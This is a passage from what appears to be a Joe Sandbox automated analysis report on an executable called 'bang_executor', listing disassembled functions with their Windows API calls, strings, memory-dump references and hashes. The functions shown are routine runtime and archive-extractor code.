                                        • _ValidateLocalCookies.LIBCMT ref: 00505068
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: MP$csm
                                        • API String ID: 1170836740-1622360913
                                        • Opcode ID: 11493c4bc1e6c7276dad87e5e205fb33bc907ce5605c2552c7765ecd68bbdae0
                                        • Instruction ID: cef50cc7ecc1728f35f6c8ae4bd5bbd10bea83b84d6c9c697d0e4063b29b1240
                                        • Opcode Fuzzy Hash: 11493c4bc1e6c7276dad87e5e205fb33bc907ce5605c2552c7765ecd68bbdae0
                                        • Instruction Fuzzy Hash: 1F411278A0021AAFCF10DF28C899A9EBFB4BF45314F148155E9149B3D2DB319A55CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F32F8 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __aulldiv.LIBCMT ref: 004F331D
                                          • Part of subcall function 004ED076: GetVersionExW.KERNEL32(?), ref: 004ED0A7
                                        • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 004F3340
                                        • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 004F3352
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004F3363
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F3373
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F3383
                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004F33BE
                                        • __aullrem.LIBCMT ref: 004F3464
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                        • String ID:
                                        • API String ID: 1247370737-0
                                        • Opcode ID: dd3d076a5563e46f6e8db5000270cc51faaf82f6f5dc68b77d9e82c308fba878
                                        • Instruction ID: 6fd155b0fcaeebbb173788da6b30b25d29121b51aede3ffb400ec5949578847b
                                        • Opcode Fuzzy Hash: dd3d076a5563e46f6e8db5000270cc51faaf82f6f5dc68b77d9e82c308fba878
                                        • Instruction Fuzzy Hash: 8B5137B1508345AFC710DF65C88496BFBE9FF88715F00892EF596C2210E739EA49CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FBC7E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: </p>$</style>$<br>$<style>$>
                                        • API String ID: 176396367-3568243669
                                        • Opcode ID: 11af583f2f2b62199f9f1b0f6adb2a8dbddb9cffbcf0a183757f30a166ebef39
                                        • Instruction ID: e6c05fe660b717e5c38b125474c2d17923a317ef7d08a970c9eed012ac71a670
                                        • Opcode Fuzzy Hash: 11af583f2f2b62199f9f1b0f6adb2a8dbddb9cffbcf0a183757f30a166ebef39
                                        • Instruction Fuzzy Hash: 9A51195664035F96DB306A19DC1177763E5DFA6790F68042BEBC18B3C0FB5C8C8182EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EACE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004EAD2B
                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004EAD4A
                                          • Part of subcall function 004EE208: _wcslen.LIBCMT ref: 004EE210
                                          • Part of subcall function 004F4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,004EE084,00000000,.exe,?,?,00000800,?,?,?,004FAD5D), ref: 004F417E
                                        • _swprintf.LIBCMT ref: 004EADEC
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • MoveFileW.KERNEL32(?,?), ref: 004EAE5E
                                        • MoveFileW.KERNEL32(?,?), ref: 004EAE9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
                                        • String ID: rtmp%d
                                        • API String ID: 2133196417-3303766350
                                        • Opcode ID: 887a5ce82f860809de33ec860dd26cc19ab2d167160c1ce5269c5f8afa39a95d
                                        • Instruction ID: 37e331945a72d47fc638c9d5ca63f9c9e751d85333bc1b1c14522c19fef33037
                                        • Opcode Fuzzy Hash: 887a5ce82f860809de33ec860dd26cc19ab2d167160c1ce5269c5f8afa39a95d
                                        • Instruction Fuzzy Hash: 595194719005986ACB20EB668C49FEF737CAF44346F0408EAB555E3141EB38AA94DF69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FBE55 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(?,00000000), ref: 004FBE8A
                                        • GetWindowRect.USER32(?,?), ref: 004FBED1
                                        • ShowWindow.USER32(?,00000005,00000000), ref: 004FBF6C
                                        • SetWindowTextW.USER32(?,00000000), ref: 004FBF74
                                        • ShowWindow.USER32(00000000,00000005), ref: 004FBF8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Window$Show$RectText
                                        • String ID: RarHtmlClassName
                                        • API String ID: 3937224194-1658105358
                                        • Opcode ID: b4b4356755d0df51c55856fbcc30cfa2da6c2408633d12cf2f70b599d9727028
                                        • Instruction ID: 299f26e30ed64db88b12426f8e221a50dd937acc88d0d62b6145fbae7a54c047
                                        • Opcode Fuzzy Hash: b4b4356755d0df51c55856fbcc30cfa2da6c2408633d12cf2f70b599d9727028
                                        • Instruction Fuzzy Hash: BF41B176108308AFCB109F64DC48BAB7BE8EF9E704F15455AFA459A252CB34D804CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FB8D5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                        • API String ID: 176396367-3743748572
                                        • Opcode ID: 8a522a0ac8eaeead818901543c063cc7a19f7f01176a6df28611a9d679228e04
                                        • Instruction ID: 45b1c07e4b3920c8522b90ff8289a5b70b3b5a9964fe425d01ff6aeaeb08e125
                                        • Opcode Fuzzy Hash: 8a522a0ac8eaeead818901543c063cc7a19f7f01176a6df28611a9d679228e04
                                        • Instruction Fuzzy Hash: C3315CA564430E56D630AA54DC42F7BB3A4FB91320F60842FE795573C0FBD8AD4443E5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050EEF4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0050EEB8: _free.LIBCMT ref: 0050EEE1
                                        • _free.LIBCMT ref: 0050EF42
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050EF4D
                                        • _free.LIBCMT ref: 0050EF58
                                        • _free.LIBCMT ref: 0050EFAC
                                        • _free.LIBCMT ref: 0050EFB7
                                        • _free.LIBCMT ref: 0050EFC2
                                        • _free.LIBCMT ref: 0050EFCD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                        • Instruction ID: 441bd77231ec598942c41ecae623a88bf79b329193ab597318378fad12a3df0d
                                        • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                        • Instruction Fuzzy Hash: EE11EA72A40B0AAAE524F7B1CC4BFCF7FAC7F84700F504C15F29A661D2DA75A5094654
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E8C95 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000020,?), ref: 004E8CB2
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004E8CB9
                                        • GetLastError.KERNEL32 ref: 004E8CF6
                                        • CloseHandle.KERNEL32(?), ref: 004E8D05
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                        • String ID: JP$^P
                                        • API String ID: 2767541406-2446375460
                                        • Opcode ID: d2b9f9deb099b2980eb5186ea9b926ae9ef49d10b9958f1df9febee618d9079b
                                        • Instruction ID: 46af68a7284942b6afed9b62de72a85848a427d7e995cddf75e6a87e7a117ac6
                                        • Opcode Fuzzy Hash: d2b9f9deb099b2980eb5186ea9b926ae9ef49d10b9958f1df9febee618d9079b
                                        • Instruction Fuzzy Hash: E2012DB4601209AFDB109FA5DC8EEFFBBBCEB19345F004419A505E2290DB359D489A60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500ACB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00500B46,00500AA9,00500D4A), ref: 00500AE2
                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00500AF8
                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00500B0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                        • API String ID: 667068680-1718035505
                                        • Opcode ID: ff02e3e3daef9442409c26730f2e7759247cdccfdc8e79f695ba130133ee47f3
                                        • Instruction ID: fad2faaeba22ce3321500ea7866e6328209cb54585e3ba3cad656114d79d9756
                                        • Opcode Fuzzy Hash: ff02e3e3daef9442409c26730f2e7759247cdccfdc8e79f695ba130133ee47f3
                                        • Instruction Fuzzy Hash: 82F0AF31B526229BDB309FA45C897FE3E8CBF263597351839A905D21C1EE50C985A2D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F418A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 004F4192
                                        • _wcslen.LIBCMT ref: 004F41A3
                                        • _wcslen.LIBCMT ref: 004F41B3
                                        • _wcslen.LIBCMT ref: 004F41C1
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,004ED2D3,?,?,00000000,?,?,?), ref: 004F41DC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$CompareString
                                        • String ID: <
                                        • API String ID: 3397213944-4251816714
                                        • Opcode ID: bf76d6c3f1fa0b4ecf7f0c55967eb448da765f0bc82d921062935b6111088544
                                        • Instruction ID: 1fd285e85bafff93eff06a1741231a3696ebb8841b7d06a78793b8587c836e7d
                                        • Opcode Fuzzy Hash: bf76d6c3f1fa0b4ecf7f0c55967eb448da765f0bc82d921062935b6111088544
                                        • Instruction Fuzzy Hash: 5AF09A32008068BFCF222F50EC4DCCF3F26EF91770B21C002F6195A0A1CE3299A296D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050B160 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0050B17E
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050B190
                                        • _free.LIBCMT ref: 0050B1A3
                                        • _free.LIBCMT ref: 0050B1B4
                                        • _free.LIBCMT ref: 0050B1C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID: p,R
                                        • API String ID: 776569668-400878132
                                        • Opcode ID: dc185045a2ddfa27a94f01c8131c1ec4e9eb2f2f3554d9c25bacd8301ffed36d
                                        • Instruction ID: 57f6ef92cdc600516f1e80e3597b1d67da37c2a825b86850feca45ce2b6a512b
                                        • Opcode Fuzzy Hash: dc185045a2ddfa27a94f01c8131c1ec4e9eb2f2f3554d9c25bacd8301ffed36d
                                        • Instruction Fuzzy Hash: D2F01DBC905222AFDA11AF55FC965DC3F75FB277287014106F41A522A0CBB6080ABF92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F3583 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 004F35E6
                                          • Part of subcall function 004ED076: GetVersionExW.KERNEL32(?), ref: 004ED0A7
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004F360A
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004F3624
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004F3637
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F3647
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F3657
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion
                                        • String ID:
                                        • API String ID: 2092733347-0
                                        • Opcode ID: 92ef35d3f84ed5deac5f81f9118402824387d81bf40410e4ebea4b4488335036
                                        • Instruction ID: 265f2e066db84cc85886b922e93b0438bb1432c5d708030ce8a126205d0cc887
                                        • Opcode Fuzzy Hash: 92ef35d3f84ed5deac5f81f9118402824387d81bf40410e4ebea4b4488335036
                                        • Instruction Fuzzy Hash: BD411C76108345ABCB04DFA8C8849ABB7E8FF98704F04891EF995C7210E734D909CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050511A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00505111,00504ECC,005021B4), ref: 00505128
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00505136
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0050514F
                                        • SetLastError.KERNEL32(00000000,00505111,00504ECC,005021B4), ref: 005051A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 976ff20184d33338b49741b86467a40b62603a701d88faf052de3c062a103a74
